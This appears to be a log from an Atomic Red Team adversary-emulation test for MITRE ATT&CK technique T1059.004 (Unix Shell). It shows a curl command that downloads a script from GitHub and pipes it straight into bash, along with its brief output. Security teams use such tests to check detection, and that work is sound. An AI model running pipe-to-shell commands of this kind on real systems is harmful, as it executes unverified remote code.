[+] Tactic ID   : T1059.004-5
[+] Technique   : Command and Scripting Interpreter - Unix Shell
[+] Command     :
curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh | bash
[+] Success
----- OUTPUT START -----
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0100   378  100   378    0     0    499      0 --:--:-- --:--:-- --:--:--   499

NOT being piped
----- OUTPUT END -----
